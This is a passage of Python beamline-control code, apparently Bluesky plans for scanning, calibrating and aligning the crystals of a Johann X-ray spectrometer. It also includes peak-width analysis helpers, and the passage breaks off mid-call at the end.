+{"seq_id": "628588", "text": "print(ttime.ctime() + ' >>>> ' + __file__)\ndef elastic_scan_plan(DE=5, dE=0.1):\n npt = np.round(DE/dE + 1)\n name = 'elastic spectrometer scan'\n plan = bp.relative_scan([pil100k, apb_ave], hhm.energy, -DE/2, DE/2, npt, md={'plan_name': 'elastic_scan ' + motor.name, 'name' : name})\n yield from plan\n\n\ndef johann_calibration_scan_plan(energies=None, DE=5, dE=0.1):\n for energy in energies:\n yield from bps.mv(hhm.energy, energy)\n # yield from move_emission_energy_plan(energy)\n yield from bps.mv(johann_emission.energy, energy)\n yield from elastic_scan_plan(DE=DE, dE=dE)\n\n\n\ndef plot_radiation_damage_scan_data(db, uid):\n t = db[uid].table()\n plt.figure()\n plt.plot(t['time'], t['pil100k_stats1_total']/np.abs(t['apb_ave_ch1_mean']))\n\n\n\n# def move_johann_spectrometer_energy(energy=-1):\n# current_energy = johann_emission.energy.position\n# energy = float(energy)\n# energy_arr = np.linspace(current_energy, energy, int(np.abs(energy - current_energy)/5) + 2)[1:]\n# for _energy in energy_arr:\n# print_to_gui(f'Moving spectrometer to {_energy}')\n# yield from bps.mv(johann_emission, _energy, wait=True)\n# # yield from move_motor_plan(motor_attr=johann_emission.energy.name, based_on='object_name', position=float(_energy))\n\ndef move_johann_spectrometer_energy(energy : float=-1):\n current_energy = johann_emission.energy.position\n energy = float(energy)\n\n current_bragg = rowland_circle.e2bragg(current_energy)\n bragg = rowland_circle.e2bragg(energy)\n\n bragg_arr = np.linspace(current_bragg, bragg, int(np.abs(bragg - current_bragg)/0.25) + 2)[1:]\n energy_arr = rowland_circle.bragg2e(bragg_arr)\n for _bragg, _energy in zip(bragg_arr, energy_arr):\n print_to_gui(f'Moving spectrometer to {_energy}')\n yield from bps.mv(johann_spectrometer, _bragg, wait=True)\n # yield from move_motor_plan(motor_attr=johann_emission.energy.name, based_on='object_name', position=float(_energy))\n\n\ndef prepare_johann_scan_plan(detectors, spectrometer_energy, spectrometer_config_uid):\n ensure_pilatus_is_in_detector_list(detectors)\n if spectrometer_config_uid is not None:\n johann_spectrometer_manager.set_config_by_uid(spectrometer_config_uid)\n yield from move_johann_spectrometer_energy(spectrometer_energy)\n # yield from bps.mv(johann_emission, spectrometer_energy)\n\ndef prepare_johann_metadata_and_kwargs(**kwargs):\n metadata = kwargs.pop('metadata')\n j_metadata = {'spectrometer': 'johann',\n 'spectrometer_config': rowland_circle.config,}\n if 'spectrometer_energy' in kwargs.keys():\n spectrometer_energy = kwargs.pop('spectrometer_energy')\n j_metadata['spectrometer_energy'] = spectrometer_energy\n if 'spectrometer_config_uid' in kwargs.keys():\n j_metadata['spectrometer_config_uid'] = kwargs.pop('spectrometer_config_uid')\n return {**j_metadata, **metadata}, kwargs\n\n\ndef collect_n_exposures_johann_plan(**kwargs):\n yield from prepare_johann_scan_plan(kwargs['detectors'], kwargs['spectrometer_energy'], kwargs['spectrometer_config_uid'])\n metadata, kwargs = prepare_johann_metadata_and_kwargs(**kwargs)\n metadata['spectrometer_config']['scan_type'] = 'constant energy'\n yield from collect_n_exposures_plan(metadata=metadata, **kwargs)\n\n\ndef step_scan_johann_herfd_plan(**kwargs):\n yield from prepare_johann_scan_plan(kwargs['detectors'], kwargs['spectrometer_energy'], kwargs['spectrometer_config_uid'])\n metadata, kwargs = prepare_johann_metadata_and_kwargs(**kwargs)\n metadata['spectrometer_config']['scan_type'] = 'constant energy'\n yield from 
step_scan_plan(metadata=metadata, **kwargs)\n\ndef fly_scan_johann_herfd_plan(**kwargs):\n # rixs_file_name = kwargs.pop('rixs_file_name')\n yield from prepare_johann_scan_plan(kwargs['detectors'], kwargs['spectrometer_energy'], kwargs['spectrometer_config_uid'])\n metadata, kwargs = prepare_johann_metadata_and_kwargs(**kwargs)\n metadata['spectrometer_config']['scan_type'] = 'constant energy'\n yield from fly_scan_plan(metadata=metadata, **kwargs)\n\n\ndef get_johann_xes_step_scan_md(name, comment, detectors_dict, emission_energy_list, emission_time_list, element, e0, line, spectrometer_config_uid, metadata):\n try:\n full_element_name = getattr(elements, element).name.capitalize()\n except:\n full_element_name = element\n md_general = get_scan_md(name, comment, detectors_dict, '.dat')\n\n md_scan = {'experiment': 'step_scan',\n 'spectrometer': 'johann',\n 'spectrometer_config': rowland_circle.config,\n 'spectrometer_config_uid': spectrometer_config_uid,\n 'spectrometer_energy_steps': emission_energy_list,\n 'spectrometer_time_steps': emission_time_list,\n 'element': element,\n 'element_full': full_element_name,\n 'line': line,\n 'e0': e0,}\n return {**md_scan, **md_general, **metadata}\n\ndef step_scan_johann_xes_plan(name=None, comment=None, detectors=[],\n mono_energy=None, mono_angle_offset=None,\n emission_energy_list=None, emission_time_list=None,\n element='', line='', e0=None,\n spectrometer_config_uid=None,\n metadata={}):\n\n default_detectors = [apb_ave, hhm_encoder]\n # default_detectors = []\n aux_detectors = get_detector_device_list(detectors, flying=False)\n all_detectors = default_detectors + aux_detectors\n detectors_dict = {k: {'device': v} for k, v in zip(detectors, aux_detectors)}\n\n if mono_angle_offset is not None: hhm.set_new_angle_offset(mono_angle_offset)\n yield from bps.mv(hhm.energy, mono_energy)\n yield from prepare_johann_scan_plan(detectors, emission_energy_list[0], spectrometer_config_uid)\n\n md = get_johann_xes_step_scan_md(name, comment, detectors_dict, emission_energy_list, emission_time_list, element,\n e0, line, spectrometer_config_uid, metadata)\n yield from general_energy_step_scan(all_detectors, johann_emission, emission_energy_list, emission_time_list, md=md)\n\n\n\ndef deal_with_sample_coordinates_for_rixs(sample_coordinates, emission_energy_list, name):\n if type(sample_coordinates) == list:\n assert len(sample_coordinates) == len(emission_energy_list), 'number of positions on the sample must match the number of energy points on emission grid'\n else:\n sample_coordinates = [sample_coordinates] * len(emission_energy_list)\n\n if type(name) == list:\n assert len(name) == len(emission_energy_list), 'number of positions on the sample must match the number of energy points on emission grid'\n else:\n name = [name] * len(emission_energy_list)\n\n return sample_coordinates, name\n\n\ndef get_johann_rixs_md(name, element_line, line, e0_line, metadata):\n # metadata['rixs_file_name'] = create_interp_file_name(name, '.rixs')\n metadata['element_line'] = element_line\n metadata['line'] = line\n metadata['e0_line'] = e0_line\n return metadata\n\n\ndef johann_rixs_plan_bundle(plan_name, name=None, comment=None, detectors=[],\n trajectory_filename=None, mono_angle_offset=None,\n emission_energy_list=None, sample_coordinates=None,\n element='', edge='', e0=None, element_line='', line='', e0_line=None,\n rixs_kwargs={}, spectrometer_config_uid=None, metadata={}):\n sample_coordinates, names = deal_with_sample_coordinates_for_rixs(sample_coordinates, 
emission_energy_list, name)\n metadata = get_johann_rixs_md(name, element_line, line, e0_line, metadata)\n plans = []\n for emission_energy, sample_position, name in zip(emission_energy_list, sample_coordinates, names):\n\n if sample_position is not None:\n plans.append({'plan_name': 'move_sample_stage_plan',\n 'plan_kwargs': {'sample_coordinates': sample_position}})\n\n plans.append({'plan_name': plan_name,\n 'plan_kwargs': {'name': f'{name} {emission_energy:0.2f}',\n 'comment': comment,\n 'detectors': detectors,\n 'trajectory_filename': trajectory_filename,\n 'element': element,\n 'edge': edge,\n 'e0': e0,\n 'spectrometer_energy': emission_energy,\n 'spectrometer_config_uid': spectrometer_config_uid,\n 'mono_angle_offset': mono_angle_offset,\n 'metadata': metadata}})\n # deal with rixs_kwargs\n return plans\n\ndef fly_scan_johann_rixs_plan_bundle(**kwargs):\n return johann_rixs_plan_bundle('fly_scan_johann_herfd_plan', **kwargs)\n\ndef step_scan_johann_rixs_plan_bundle(**kwargs):\n return johann_rixs_plan_bundle('step_scan_johann_herfd_plan', **kwargs)\n\n\nfrom xas.spectrometer import analyze_elastic_fly_scan\n\ndef obtain_spectrometer_resolution_plan(rois=None, plot_func=None, liveplot_kwargs=None, attempts=5, sleep=5, alignment_data=None):\n for i in range(attempts):\n try:\n print_to_gui(f'Analyzing resolution scan: attempt {i+1}', tag='Spectrometer', add_timestamp=True)\n fwhm = analyze_elastic_fly_scan(db, -1, rois=rois, plot_func=plot_func)\n if alignment_data is not None:\n start = db[-1].start\n uid = start.uid\n _dict = {'uid': uid,\n 'fwhm': fwhm,\n 'tweak_motor_description': start['tweak_motor_description'],\n 'tweak_motor_position': start['tweak_motor_position']}\n alignment_data.append(_dict)\n yield from bps.null()\n break\n except Exception as e:\n yield from bps.sleep(sleep)\n\n\n\ndef johann_resolution_scan_plan_bundle(e_cen=8000.0, e_width=10.0, e_velocity=2.0, rois=None, motor_info='', plan_gui_services=None, liveplot_kwargs=None, md=None, alignment_data=None):\n plans = []\n trajectory_filename = scan_manager.quick_linear_trajectory_filename(e_cen, e_width, e_velocity)\n if md is None: md = {}\n\n name = f'Resolution scan {e_cen} {motor_info}'\n scan_kwargs = {'name': name, 'comment': '',\n 'trajectory_filename': trajectory_filename,\n 'detectors': ['Pilatus 100k'],\n 'element': '', 'e0': e_cen, 'edge': '',\n 'metadata': md}\n\n plans.append({'plan_name': 'fly_scan_plan',\n 'plan_kwargs': {**scan_kwargs}})\n plans.append({'plan_name': 'obtain_spectrometer_resolution_plan',\n 'plan_kwargs': {'rois' : rois, 'liveplot_kwargs': liveplot_kwargs, 'alignment_data': alignment_data},\n 'plan_gui_services': plan_gui_services})\n\n return plans\n\n\n\ndef quick_crystal_motor_scan(motor_description=None, scan_range=None, velocity=None, pil100k_exosure_time=0.1, plot_func=None, liveplot_kwargs=None, md=None):\n motor_device = get_motor_device(motor_description, based_on='description')\n detectors = [apb.ch1, pil100k.stats1.total, pil100k.stats2.total, pil100k.stats3.total, pil100k.stats4.total, ]\n\n print_to_gui(f'Quick scanning motor {motor_description}', tag='Spectrometer')\n\n num_images = (scan_range / velocity + 1) / pil100k_exosure_time\n print(num_images)\n pil100k_init_exposure_time = pil100k.cam.acquire_period.get()\n pil100k_init_num_images = pil100k.cam.num_images.get()\n pil100k_init_image_mode = pil100k.cam.image_mode.get()\n\n pil100k.set_exposure_time(pil100k_exosure_time)\n pil100k.set_num_images(num_images)\n\n pil100k.cam.image_mode.set(1).wait()\n\n 
start_acquiring_plan = bps.mv(pil100k.cam.acquire, 1)\n yield from ramp_motor_scan(motor_device, detectors, scan_range, velocity=velocity, return_motor_to_initial_position=True, start_acquiring_plan=start_acquiring_plan, md=md)\n\n pil100k.set_exposure_time(pil100k_init_exposure_time)\n pil100k.set_num_images(pil100k_init_num_images)\n pil100k.cam.image_mode.set(pil100k_init_image_mode).wait()\n\n\n\n# RE(quick_crystal_motor_scan(motor_description='Johann Main Crystal Roll',\n# scan_range=800,\n# velocity=25))\n\n# def _estimate_width_of_the_peak\n# from numpy.polynomial import Polynomial\n\nfrom scipy.signal import savgol_filter\ndef estimate_center_and_width_of_peak(E, I):\n E_cen = E[np.argmax(np.abs(I))]\n e_low = E < E_cen\n e_high = E > E_cen\n x1 = np.interp(0.5, I[e_low], E[e_low])\n x2 = np.interp(0.5, I[e_high][np.argsort(I[e_high])], E[e_high][np.argsort(I[e_high])])\n fwhm = np.abs(x1 - x2)\n return E_cen, fwhm, x1, x2\n\ndef smooth_any_peak(x, y, n=4):\n y_fit = savgol_filter(y, 5, 3)\n return x, y, y_fit\n\ndef _estimate_peak_properties(x, y, plotting=False, fignum=None, clear=False):\n y_smooth = savgol_filter(y, 5, 3)\n # y_smooth_bkg = np.mean(y_smooth[y_smooth<=np.percentile(y_smooth[1:-1], 3 / y.size * 100)])\n # y_smooth_bkg = np.mean(y_smooth[5:20])\n y_smooth_bkg = np.mean(y_smooth[:3])\n # y_smooth_max = y_smooth.max()\n y_smooth_max = np.mean(np.sort(y_smooth)[-3:])\n y_smooth = (y_smooth - y_smooth_bkg) / (y_smooth_max - y_smooth_bkg)\n x_cen, x_fwhm, x1, x2 = estimate_center_and_width_of_peak(x, y_smooth)\n x_com = np.sum(x * y_smooth) / np.sum(y_smooth)\n x_mask = (x >= x1) & (x <= x2)\n y12_int = np.trapz(y_smooth[x_mask], x[x_mask])\n if plotting:\n plt.figure(fignum, clear=clear)\n plt.plot(x - x_com, (y - y_smooth_bkg) / (y_smooth_max - y_smooth_bkg), 'k.')\n plotted_lines = plt.plot(x - x_com, y_smooth, '-')\n color = plotted_lines[0].get_color()\n plt.vlines([x1 - x_com, x2 - x_com], 0, 1, colors=color)\n plt.hlines([0.5], x1 - x_com, x2 - x_com, colors=color)\n return x_cen, x_fwhm, x1, x2, y12_int\n\ndef _estimate_peak_fwhm(x, y, **kwargs):\n _, x_fwhm, _, _, y12_int = _estimate_peak_properties(x, y, **kwargs)\n return x_fwhm, y12_int\n\ndef _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, **kwargs):\n x = df[x_col].values\n y = df[y_col].values\n return _estimate_peak_fwhm(x, y, **kwargs)\n\n# _estimate_peak_fwhm_from_roll_scan(t, 'johann_main_crystal_motor_cr_main_roll', 'pil100k_stats1_total', plotting=True, clear=True)\n\ndef estimate_peak_fwhm_from_roll_scan(db, uid, x_col='johann_main_crystal_motor_cr_main_roll', y_col='pil100k_stats1_total', **kwargs):\n df = process_monitor_scan(db, uid, det_for_time_base='pil100k')\n df = df[3 : df.shape[0]-3]\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, **kwargs)[0]\n\ndef estimate_peak_intensity_from_roll_scan(db, uid, x_col='johann_main_crystal_motor_cr_main_roll', y_col='pil100k_stats1_total', **kwargs):\n df = process_monitor_scan(db, uid, det_for_time_base='pil100k')\n df = df[3 : df.shape[0]-3]\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, **kwargs)[1]\n\ndef plot_roll_scan(db, uid, x_col='johann_main_crystal_motor_cr_main_roll', y_col='pil100k_stats1_total', **kwargs):\n df = process_monitor_scan(db, uid, det_for_time_base='pil100k')\n df = df[3 : df.shape[0]-3]\n plt.plot(df[x_col], df[y_col])\n\n\n\n# RE(general_scan(detectors=['Pilatus 100k'], motor='Johann Main Crystal Roll',\n# rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.1, 
liveplot_kwargs={}))\n\n# _estimate_peak_fwhm_from_roll_scan(db[-1].table(), 'johann_main_crystal_motor_cr_main_roll', 'pil100k_stats1_total', plotting=True)\n\ndef run_alignment_scans_for_crystal(motor=None, rel_start=None, rel_stop=None, num_steps=None, exposure_time=None,\n tweak_motor=None, tweak_motor_rel_start=None, tweak_motor_rel_stop=None, tweak_motor_num_steps=None):\n tweak_motor_pos = tweak_motor.position + np.linspace(tweak_motor_rel_start, tweak_motor_rel_stop, tweak_motor_num_steps)\n uids = []\n for i, _pos in enumerate(tweak_motor_pos):\n print_to_gui(f'Aligning motor {tweak_motor.name} (step {i + 1}, position={_pos})', add_timestamp=True, tag='Spectrometer')\n yield from bps.mv(tweak_motor, _pos)\n md = {tweak_motor.name: tweak_motor.position}\n # print_to_gui(f'motor {motor} position before scanning {johann_main_crystal.motor_cr_main_roll.position}', add_timestamp=True,\n # tag='Spectrometer')\n uid = yield from general_scan(detectors=['Pilatus 100k'], motor=motor, rel_start=rel_start, rel_stop=rel_stop, num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n uids.append(uid)\n\n return uids\n\n\ndef run_quick_alignment_scan_for_crystal_at_tweak_pos(motor_description=None, scan_range=None, velocity=None,\n tweak_motor=None, tweak_motor_pos=None):\n yield from bps.mv(tweak_motor, tweak_motor_pos)\n md = {tweak_motor.name: tweak_motor.position}\n return (yield from quick_crystal_motor_scan(motor_description=motor_description, scan_range=scan_range,\n velocity=velocity, md=md))\n\n\ndef run_quick_alignment_scans_for_crystal(motor_description=None, scan_range=None, velocity=None,\n tweak_motor=None, tweak_motor_rel_start=None, tweak_motor_rel_stop=None, tweak_motor_num_steps=None):\n tweak_motor_init_pos = tweak_motor.position\n tweak_motor_pos = tweak_motor_init_pos + np.linspace(tweak_motor_rel_start, tweak_motor_rel_stop, tweak_motor_num_steps)\n uids = []\n for i, _pos in enumerate(tweak_motor_pos):\n print_to_gui(f'Aligning motor {tweak_motor.name} (step {i + 1}, position={_pos})', add_timestamp=True,\n tag='Spectrometer')\n uid = yield from run_quick_alignment_scan_for_crystal_at_tweak_pos(motor_description=motor_description, scan_range=scan_range, velocity=velocity,\n tweak_motor=tweak_motor, tweak_motor_pos=_pos)\n uids.append(uid)\n yield from bps.mv(tweak_motor, tweak_motor_init_pos)\n return uids\n\n\n\ndef bragg_scan_for_individual_crystals(rel_start=None, rel_stop=None, num_steps=None, exposure_time=None, yaw_offset=None):\n\n bragg_motors = ['Johann Main Crystal Bragg']\n\n uids = []\n for i, _pos in enumerate(tweak_motor_pos):\n print_to_gui(f'Aligning motor {tweak_motor.name} (step {i + 1}, position={_pos})', add_timestamp=True, tag='Spectrometer')\n yield from bps.mv(tweak_motor, _pos)\n md = {tweak_motor.name: tweak_motor.position}\n # print_to_gui(f'motor {motor} position before scanning {johann_main_crystal.motor_cr_main_roll.position}', add_timestamp=True,\n # tag='Spectrometer')\n uid = yield from general_scan(detectors=['Pilatus 100k'], motor=motor, rel_start=rel_start, rel_stop=rel_stop, num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n uids.append(uid)\n\n return uids\n\n\n\n# RE(run_alignment_scans_for_crystal(motor='Johann Main Crystal Roll', rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.5,\n# tweak_motor=johann_spectrometer_x, tweak_motor_rel_start=-10, tweak_motor_rel_stop=10, tweak_motor_num_steps=3))\n# RE(run_alignment_scans_for_crystal(motor='Johann Aux2 Crystal Roll', 
rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.5,\n# tweak_motor=johann_aux2_crystal.motor_cr_aux2_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=9))\n# RE(run_alignment_scans_for_crystal(motor='Johann Aux3 Crystal Roll', rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.5,\n# tweak_motor=johann_aux3_crystal.motor_cr_aux3_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=3))\n\n# RE(run_quick_alignment_scans_for_crystal(motor_description='Johann Main Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_spectrometer_x, tweak_motor_rel_start=-10, tweak_motor_rel_stop=10, tweak_motor_num_steps=9))\n# RE(run_quick_alignment_scans_for_crystal(motor_description='Johann Aux2 Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_aux2_crystal.motor_cr_aux2_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=9))\n# RE(run_quick_alignment_scans_for_crystal(motor_description='Johann Aux3 Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_aux3_crystal.motor_cr_aux3_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=11))\n\n\n# RE(run_quick_alignment_scan_for_crystal_at_tweak_pos(motor_description='Johann Aux2 Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_aux2_crystal.motor_cr_aux2_x, tweak_motor_pos=12400))\n\n\n\n\n\n\n_crystal_alignment_dict = {'main': {'roll': 'Johann Main Crystal Roll',\n 'yaw': 'Johann Main Crystal Yaw',\n 'x': 'Johann Crystal Assy X'},\n 'aux2': {'roll': 'Johann Aux2 Crystal Roll',\n 'yaw': 'Johann Aux2 Crystal Yaw',\n 'x': 'Johann Aux2 Crystal X'},\n 'aux3': {'roll': 'Johann Aux3 Crystal Roll',\n 'yaw': 'Johann Aux3 Crystal Yaw',\n 'x': 'Johann Aux3 Crystal X'},\n 'aux4': {'roll': 'Johann Aux4 Crystal Roll',\n 'yaw': 'Johann Aux4 Crystal Yaw',\n 'x': 'Johann Aux4 Crystal X'},\n 'aux5': {'roll': 'Johann Aux5 Crystal Roll',\n 'yaw': 'Johann Aux5 Crystal Yaw',\n 'x': 'Johann Aux5 Crystal X'}\n }\n\n\n\ndef crystal_piezo_scan(crystal=None, axis=None, scan_range=None, step_size=None, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None):\n motor_description = _crystal_alignment_dict[crystal][axis]\n rel_start, rel_stop, num_steps = convert_range_to_start_stop(scan_range, step_size)\n yield from general_scan(detectors=['Pilatus 100k'], motor=motor_description, rel_start=rel_start, rel_stop=rel_stop,\n num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n\ndef johann_hhm_resolution_scan(scan_range=None, step_size=None, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None):\n motor_description = 'A Monochromator Energy'\n rel_start, rel_stop, num_steps = convert_range_to_start_stop(scan_range, step_size)\n yield from general_scan(detectors=['Pilatus 100k'], motor=motor_description, rel_start=rel_start, rel_stop=rel_stop,\n num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n\n# RE(johann_hhm_resolution_scan(scan_range=10, step_size=0.5, exposure_time=0.5))\n\n# RE(crystal_piezo_scan(crystal='main', axis='roll', scan_range=800, step_size=10, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None))\ndef crystal_piezo_tune(property='com', pil100k_roi_num=None, **kwargs):\n yield from crystal_piezo_scan(**kwargs)\n t = db[-1].table()\n\n motor_description = _crystal_alignment_dict[kwargs['crystal']][kwargs['axis']]\n motor_object = get_motor_device(motor_description, based_on='description')\n x = 
t[motor_object.name].values\n y = t[f'pil100k_stats{pil100k_roi_num}_total'].values\n\n if property == 'com':\n new_position = np.sum((y - y.min()) * x) / np.sum((y - y.min()))\n else:\n raise ValueError('not implemented')\n\n yield from move_motor_plan(motor_attr=motor_description, based_on='description', position=new_position)\n\n# RE(crystal_piezo_tune(property='com', roi_num=1, crystal='main', axis='yaw', rel_start=-400, rel_stop=400, num_steps=25, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None))\n\ndef estimate_peak_fwhm_from_roll_scan(uid, crystal, pil100k_roi_num=1,plotting=False, fignum=None, clear=True):\n motor_description = _crystal_alignment_dict[crystal]['roll']\n motor_object = get_motor_device(motor_description, based_on='description')\n x_col = motor_object.name\n y_col = f'pil100k_stats{pil100k_roi_num}_total'\n\n df = db[uid].table()\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, plotting=plotting, fignum=fignum, clear=clear)[0]\n\ndef estimate_peak_fwhm_from_elastic_step_scan(uid, pil100k_roi_num=1,plotting=False, fignum=None, clear=True):\n x_col = 'hhm_energy'\n y_col = f'pil100k_stats{pil100k_roi_num}_total'\n\n df = db[uid].table()\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, plotting=plotting, fignum=fignum, clear=clear)[0]\n\ndef process_crystal_piezo_roll_scan(crystal=None, pil100k_roi_num=None, alignment_data=None, plot_func=None, uid=-1):\n fwhm = estimate_peak_fwhm_from_roll_scan(uid, crystal, pil100k_roi_num=pil100k_roi_num)\n hdr = db[uid]\n start = hdr.start\n uid = start.uid\n print(uid)\n _dict = {'uid': uid,\n 'fwhm': fwhm,\n 'tweak_motor_description': start['tweak_motor_description'],\n 'tweak_motor_position': start['tweak_motor_position']}\n alignment_data.append(_dict)\n yield from bps.null()\n\ndef process_elastic_step_scan(pil100k_roi_num=None, alignment_data=None, plot_func=None, uid=-1):\n fwhm = estimate_peak_fwhm_from_elastic_step_scan(uid, pil100k_roi_num=pil100k_roi_num)\n hdr = db[uid]\n start = hdr.start\n uid = start.uid\n print(uid)\n _dict = {'uid': uid,\n 'fwhm': fwhm,\n 'tweak_motor_description': start['tweak_motor_description'],\n 'tweak_motor_position': start['tweak_motor_position']}\n alignment_data.append(_dict)\n yield from bps.null()\n\n# process_crystal_piezo_roll_scan(crystal='main', pil100k_roi_num=1, alignment_data=[])\n\n\ndef quick_crystal_piezo_scan(crystal=None, axis=None, scan_range=None, velocity=None, pil100k_exosure_time=0.1, plot_func=None, liveplot_kwargs=None, md=None):\n motor_description = _crystal_alignment_dict[crystal][axis]\n motor_device = get_motor_device(motor_description, based_on='description')\n detectors = [apb.ch1, pil100k.stats1.total, pil100k.stats2.total, pil100k.stats3.total, pil100k.stats4.total, ]\n\n print_to_gui(f'Quick scanning motor {motor_description}', tag='Spectrometer')\n\n num_images = (scan_range / velocity + 1) / pil100k_exosure_time\n print(num_images)\n pil100k_init_exposure_time = pil100k.cam.acquire_period.get()\n pil100k_init_num_images = pil100k.cam.num_images.get()\n pil100k_init_image_mode = pil100k.cam.image_mode.get()\n\n pil100k.set_exposure_time(pil100k_exosure_time)\n pil100k.set_num_images(num_images)\n\n pil100k.cam.image_mode.set(1).wait()\n\n start_acquiring_plan = bps.mv(pil100k.cam.acquire, 1)\n yield from ramp_motor_scan(motor_device, detectors, scan_range, velocity=velocity, return_motor_to_initial_position=True, start_acquiring_plan=start_acquiring_plan, md=md)\n\n 
pil100k.set_exposure_time(pil100k_init_exposure_time)\n pil100k.set_num_images(pil100k_init_num_images)\n pil100k.cam.image_mode.set(pil100k_init_image_mode).wait()\n\n\ndef quick_crystal_piezo_tune(**kwargs):\n yield from quick_crystal_piezo_scan(**kwargs)\n com = obtain_ramp_scan_com_plan(db, -1)\n motor_description = _crystal_alignment_dict[kwargs['crystal']][kwargs['axis']]\n yield from move_motor_plan(motor_attr=motor_description, based_on='description', position=com)\n\n\ndef get_tweak_motor_positions_for_crystal(crystal, motor_range_mm, motor_num_steps):\n motor_description = _crystal_alignment_dict[crystal]['x']\n motor_obj = get_motor_device(motor_description, based_on='description')\n motor_pos_init = motor_obj.position\n\n motor_pos_start = motor_pos_init - motor_range_mm / 2\n motor_pos_stop = motor_pos_init + motor_range_mm / 2\n\n motor_pos_steps = np.linspace(motor_pos_start, motor_pos_stop, motor_num_steps)\n\n motor_low_lim = motor_obj.low_limit # check this\n motor_high_lim = motor_obj.high_limit # check this\n motor_pos_steps = motor_pos_steps[(motor_pos_steps >= motor_low_lim) & (motor_pos_steps <= motor_high_lim)]\n return motor_pos_init, motor_pos_steps, motor_description\n\n\ndef run_alignment_scans_for_crystal_bundle(crystal=None, alignment_by=None, pil100k_roi_num=None,\n alignment_data=None,\n scan_range_roll=None, scan_range_yaw=None, step_size=None,\n exposure_time = None,\n tweak_motor_range=None, tweak_motor_num_steps=None,\n plot_func=None, liveplot_kwargs=None):\n if alignment_data is None:\n alignment_data = []\n tweak_motor_init_pos, tweak_motor_pos, tweak_motor_description = get_tweak_motor_positions_for_crystal(crystal, tweak_motor_range, tweak_motor_num_steps)\n\n plans = []\n\n for i, _pos in enumerate(tweak_motor_pos):\n plans.append({'plan_name': 'print_message_plan',\n 'plan_kwargs': {'msg': f'Aligning motor {tweak_motor_description} (step {i + 1}, position={_pos})',\n 'add_timestamp': True,\n 'tag': 'Spectrometer'}})\n plans.append({'plan_name': 'move_motor_plan',\n 'plan_kwargs': {'motor_attr': tweak_motor_description,\n 'based_on': 'description',\n 'position': _pos}})\n if crystal != 'main':\n plans.append({'plan_name': 'crystal_piezo_tune',\n 'plan_kwargs': {'property': 'com',\n 'pil100k_roi_num': pil100k_roi_num,\n 'crystal': crystal,\n 'axis': 'yaw',\n 'scan_range': scan_range_yaw,\n 'step_size': 25, # step_size\n 'exposure_time': exposure_time,\n 'plot_func': plot_func,\n 'liveplot_kwargs': liveplot_kwargs}})\n\n md = {'tweak_motor_description': tweak_motor_description,\n 'tweak_motor_position': _pos}\n\n if alignment_by == 'emission':\n plans.append({'plan_name': 'crystal_piezo_scan',\n 'plan_kwargs': {'crystal': crystal,\n 'axis': 'roll',\n 'scan_range': scan_range_roll,\n 'step_size': step_size,\n 'exposure_time': exposure_time,\n 'plot_func': plot_func,\n 'liveplot_kwargs': liveplot_kwargs,\n 'md': md}})\n plans.append({'plan_name': 'process_crystal_piezo_roll_scan',\n 'plan_kwargs': {'crystal': crystal,\n 'pil100k_roi_num': pil100k_roi_num,\n 'alignment_data': alignment_data}})\n\n\n elif alignment_by == 'elastic':\n e_cen = hhm.energy.position\n plans.append({'plan_name': 'johann_hhm_resolution_scan',\n 'plan_kwargs': {'scan_range': scan_range_roll,\n 'step_size': 0.1,\n 'exposure_time': exposure_time,\n 'plot_func': plot_func,\n 'liveplot_kwargs': liveplot_kwargs,\n 'md': md}})\n plans.append({'plan_name': 'process_elastic_step_scan',\n 'plan_kwargs': {'pil100k_roi_num': pil100k_roi_num,\n 'alignment_data': alignment_data}})\n\n # 
plans.append({'plan_name': 'move_mono_energy',\n # 'plan_kwargs': {'energy': e_cen}})\n\n\n plans.append({'plan_name': 'move_motor_plan',\n 'plan_kwargs': {'motor_attr': tweak_motor_description,\n 'based_on': 'description',\n 'position': tweak_motor_init_pos}})\n\n return plans\n\nALIGNMENT_DATA = []\n# plans = run_alignment_scans_for_crystal_bundle(crystal='main', alignment_by='elastic', pil100k_roi_num=1,\n# alignment_data=ALIGNMENT_DATA,\n# scan_range_roll=12, scan_range_yaw=400, step_size=10,\n# exposure_time = 0.5,\n# tweak_motor_range=20, tweak_motor_num_steps=9,\n# plot_func=None, liveplot_kwargs=None)\n\n# plans = run_alignment_scans_for_crystal_bundle(crystal='aux2', alignment_by='elastic', pil100k_roi_num=1,\n# alignment_data=ALIGNMENT_DATA,\n# scan_range_roll=12, scan_range_yaw=600, step_size=20,\n# exposure_time = 0.3,\n# tweak_motor_range=24000, tweak_motor_num_steps=11,\n# plot_func=None, liveplot_kwargs=None)\n\nplans = run_alignment_scans_for_crystal_bundle(crystal='main', alignment_by='emission', pil100k_roi_num=1,\n alignment_data=ALIGNMENT_DATA,\n scan_range_roll=800, scan_range_yaw=400, step_size=10,\n exposure_time = 0.3,\n tweak_motor_range=15, tweak_motor_num_steps=7,\n plot_func=None, liveplot_kwargs=None)\n\n# plans = run_alignment_scans_for_crystal_bundle(crystal='aux5', alignment_by='emission', pil100k_roi_num=1,\n# alignment_data=ALIGNMENT_DATA,\n# scan_range_roll=800, scan_range_yaw=600, 